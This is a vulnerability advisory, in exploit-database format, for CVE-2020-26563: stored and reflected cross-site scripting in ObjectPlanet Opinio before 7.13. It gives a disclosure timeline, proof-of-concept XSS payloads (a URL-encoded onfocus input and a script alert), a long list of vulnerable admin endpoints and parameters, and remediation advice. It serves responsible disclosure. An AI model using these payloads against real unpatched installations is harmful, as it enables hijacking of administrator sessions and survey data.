# Exploit Title: ObjectPlanet Opinio 7.12 allows Cross-Site Scripting
# Vendor Homepage: https://www.objectplanet.com/opinio/
# Software Link: https://www.objectplanet.com/opinio/
# Exploit Authors: Ang Kar Min (https://www.linkedin.com/in/karmin-ang)
# CVE: CVE-2020-26563

# Timeline
- September 2019:  Initial discovery
- July 2020:  Reported to ObjectPlanet
- August 2020:  Fix/patch provided by ObjectPlanet
- July 2021:  Published CVE-2020-26563

# 1. Introduction
Opinio is a survey management solution by ObjectPlanet that allows surveys to be designed, published and managed.

# 2. Vulnerability Details
ObjectPlanet Opinio before version 7.13 is vulnerable to stored Cross-Site Scripting (Stored XSS) and reflected Cross-Site Scripting (Reflected XSS).

# 3. Proof of Concept

### Reflected XSS executed in URL ###

The following payload was executed when injected as part of the URL"/survey/admin/surveyAdmin.do?action=viewSurveyAdmin&surveyId=1234":
 
“&zwzc4%22%3e%3cinput%20type%3dtext%20autofocus%20onfocus%3dconfirm(1)%2f%2f” 

Affected URL:/survey/admin/surveyAdmin.do?


### Stored XSS ###
Stored XSS payload such as “<script>alert(‘XSS ATTACK’)</script> can be saved for various parameter fields. This malicious payload can be executed upon a user visit to a page that publishes or previews the payload.

For example, a malicious XSS script can be added during the creation of a survey question for a given survey. During the preview of the survey, the stored XSS payload will trigger the XSS vulnerability.

The previous example can be observed in other variations of the vulnerability where the affected parameters accepts the malicious script.

Affected URL(s) and Parameter(s):
- /survey/admin/question.do   
'questionText', 'ratingMinText', 'ratingMaxText', 'ratingNALabel', 'multMinError', 'numError', 'numPrefix', 'numPostfix', 'numReqError', 'dropdownLabel',  parameters

- /survey/admin/section.do   
'title' parameter

- /survey/admin/sectionText.do   
'text' parameter

- /survey/admin/plugin.do   
'plugin_survey_closed_message', 'plugin_restrict_nrics', '&plugin_survey_email_content' parameter

- /survey/admin/confirm.do   
'confirmMessageKeyParam', ‘org.apache.struts.taglib.html.TOKEN’ parameter

- /survey/admin/folder.do  
'msgKey' parameter

- /survey/admin/file.do  
'resourceName', ‘resourcePath’ parameter

- /survey/admin/setup.do   
'characterEncoding', 'emailForErrors', 'fromEmail', 'language', 'systemBaseUrl' parameters

- /survey/admin/questionList.do?action=viewQuestionList&surveyId=1806   
arbitrarily supplied URL parameter

- /survey/admin/resources.do?action=viewResourcesByType&resourceType=8&fileListType=6125&selectedPreviewLocation=&selectedPreviewHeight=&selectedPreviewWidth=&selectedRadioId=select1_&copyToPosition=-1&isSimpleLayout=false   
arbitrarily supplied URL parameter

- /survey/admin/surveyAdmin.do?action=viewSurveyAdmin&surveyId=3404&isPoll=1   
arbitrarily supplied URL parameter


# 4. Remediation
Apply the latest fix/patch from objectplanet.

# 5. Credits
Ang Kar Min (https://www.linkedin.com/in/karmin-ang)